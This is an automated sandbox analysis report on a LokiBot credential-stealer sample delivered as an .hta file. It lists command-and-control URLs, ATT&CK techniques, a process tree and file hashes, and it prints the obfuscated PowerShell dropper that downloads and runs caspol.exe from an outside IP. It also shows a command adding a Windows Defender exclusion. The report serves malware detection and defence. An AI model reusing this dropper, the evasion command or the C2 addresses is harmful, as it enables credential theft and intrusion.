lokibot | dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21

Analysis

max time kernel
132s
max time network
145s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
19-11-2024 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21.hta
Size

178KB
MD5

a54bdd270a424ec79b735ef6b513c2e4
SHA1

465738a3e31b16ad80c44f3dc7bdd762e402cb51
SHA256

dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
SHA512

598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61
SSDEEP

96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://94.156.177.95/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2772	pOWERSHELl.exE

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2844	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2772	pOWERSHELl.exE
2744	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2560	caspol.exe
2916	caspol.exe

Loads dropped DLL 3 IoCs

pid	Process
2772	pOWERSHELl.exE
2772	pOWERSHELl.exE
2772	pOWERSHELl.exE

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2560 set thread context of 2916	2560	caspol.exe	39

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWERSHELl.exE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caspol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2772	pOWERSHELl.exE
2744	powershell.exe
2844	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	pOWERSHELl.exE
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	2916	caspol.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2672 wrote to memory of 2772	2672	mshta.exe	30
PID 2672 wrote to memory of 2772	2672	mshta.exe	30
PID 2672 wrote to memory of 2772	2672	mshta.exe	30
PID 2672 wrote to memory of 2772	2672	mshta.exe	30
PID 2772 wrote to memory of 2744	2772	pOWERSHELl.exE	32
PID 2772 wrote to memory of 2744	2772	pOWERSHELl.exE	32
PID 2772 wrote to memory of 2744	2772	pOWERSHELl.exE	32
PID 2772 wrote to memory of 2744	2772	pOWERSHELl.exE	32
PID 2772 wrote to memory of 2592	2772	pOWERSHELl.exE	33
PID 2772 wrote to memory of 2592	2772	pOWERSHELl.exE	33
PID 2772 wrote to memory of 2592	2772	pOWERSHELl.exE	33
PID 2772 wrote to memory of 2592	2772	pOWERSHELl.exE	33
PID 2592 wrote to memory of 2704	2592	csc.exe	34
PID 2592 wrote to memory of 2704	2592	csc.exe	34
PID 2592 wrote to memory of 2704	2592	csc.exe	34
PID 2592 wrote to memory of 2704	2592	csc.exe	34
PID 2772 wrote to memory of 2560	2772	pOWERSHELl.exE	36
PID 2772 wrote to memory of 2560	2772	pOWERSHELl.exE	36
PID 2772 wrote to memory of 2560	2772	pOWERSHELl.exE	36
PID 2772 wrote to memory of 2560	2772	pOWERSHELl.exE	36
PID 2560 wrote to memory of 2844	2560	caspol.exe	37
PID 2560 wrote to memory of 2844	2560	caspol.exe	37
PID 2560 wrote to memory of 2844	2560	caspol.exe	37
PID 2560 wrote to memory of 2844	2560	caspol.exe	37
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39
PID 2560 wrote to memory of 2916	2560	caspol.exe	39

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
  "C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oamphm9s.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2434.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2433.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2704
- - C:\Users\Admin\AppData\Roaming\caspol.exe
    "C:\Users\Admin\AppData\Roaming\caspol.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2844
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2434.tmp

Filesize
1KB

MD5
075820a997ab6ac06bacc6e3771fd39f

SHA1
a614aa4fe0a3dd324b5cac3fb428a13c4987ccc0

SHA256
937d8721d8bedaa8314744a562c637730da6bf40085861dc32b073d6ec37e4a6

SHA512
ba4ea6ab7c943eca5239f1b74a350cd303fa30ffea1189d543e05841c8ea2cdcea1dd04b68948015ad2af0ea9654fbcd2171d7c2a46cc73e155312e8f5260c98

Download Submit
C:\Users\Admin\AppData\Local\Temp\oamphm9s.dll

Filesize
3KB

MD5
dfd69347d20876009b828bb85fde4441

SHA1
83aa9e3231d3b13d3668eb1fb70258bb1b269558

SHA256
abfc7ff9dab15b55970f5133b4f4adcadbe11a0d49d4aad256715f5d43db6b1d

SHA512
c4b1a28d94f3cfdbd98b092cd5cff8c76b4d7bbc0716e4ba3d092f8a14796331bb0fb07227fc8d0c605f5def227852206bff671b1ba1e8223c952451e9448179

Download Submit
C:\Users\Admin\AppData\Local\Temp\oamphm9s.pdb

Filesize
7KB

MD5
6de09c8e9cdf254763907649c49a8c59

SHA1
ee1b12eb34f2620f8e15a224416cc27b8f6a89b9

SHA256
eb8081b212f079133f0dbf9dc8f6eceaead800575960b86cd236f5f0bc7bae33

SHA512
76e22cff54dce6ac71e6772a18417be894cca24f13c7c042a7a1a88f72e8033392066906533d18c87a30b3d0dd169176343eb56dbba1f2b5205b705432c719fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e70ee00917b17f0798f468bbc8153436

SHA1
54e46d4344a2450a628c71968ed80eead731e3be

SHA256
4d6a75fd371cc41f51049c5b1e0e1ee6a4e6ef1183e0b178eba780fc04b9dc0d

SHA512
ffd44eb4e44953e4a13d901323e30e82282f37603beb734ccb09d3c97d7c7f5305322368a7d17fd9479420b88f4ca4802e4ba3e11f8f0bb9c6953fe05a4828bc

Download Submit
C:\Users\Admin\AppData\Roaming\caspol.exe

Filesize
570KB

MD5
80358303e33cef71434e6e4a621262c5

SHA1
e7a22b4e5af741f9b4d9982f36164b276bba459a

SHA256
f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7

SHA512
5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2433.tmp

Filesize
652B

MD5
63cf5da0b5703a07270662968637ae87

SHA1
5d0f472ed11b0888b1a4f3631735ce784c336df3

SHA256
0010ff436418844699c88ac62263533fa14a2da52324a88dbac2f1d893c12e7c

SHA512
424ea0d5e992c834b75f95fb0ccb3cf06f91c9aeef75d03b290d2f202d8e1cb665fe91ea0517aa355e694a1d95f158b5e7f546ce1bd66641783ff4f31f05a9d0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oamphm9s.0.cs

Filesize
477B

MD5
f97fc8141f59078b4354b513d3b083ac

SHA1
293904ab8d5f38a2f0764ee2e35e97e590d8c737

SHA256
f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e

SHA512
87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oamphm9s.cmdline

Filesize
309B

MD5
87e371d57d62a8cf0c7f0fd3c4ce9160

SHA1
047a2e442ff64e32566038e84ba5790eca8f5be1

SHA256
106b51b99d1af2bb8ac80a279f63f07c8f097c02e9be6fd213edf4d11ac4a65d

SHA512
ace21512343df0baefa658e931acbc194ab81b1d0ddc4c427d851beb55423efb4400db5edb0530b7a3cf41828a3c9d332223048a574a9a250a8d768e1793cf48

Download Submit
memory/2560-37-0x00000000054E0000-0x0000000005544000-memory.dmp

Filesize
400KB

Download
memory/2560-36-0x0000000000730000-0x0000000000742000-memory.dmp

Filesize
72KB

Download
memory/2560-35-0x0000000000330000-0x00000000003C4000-memory.dmp

Filesize
592KB

Download
memory/2916-38-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2916-51-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2916-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2916-46-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2916-44-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2916-42-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2916-40-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2916-49-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download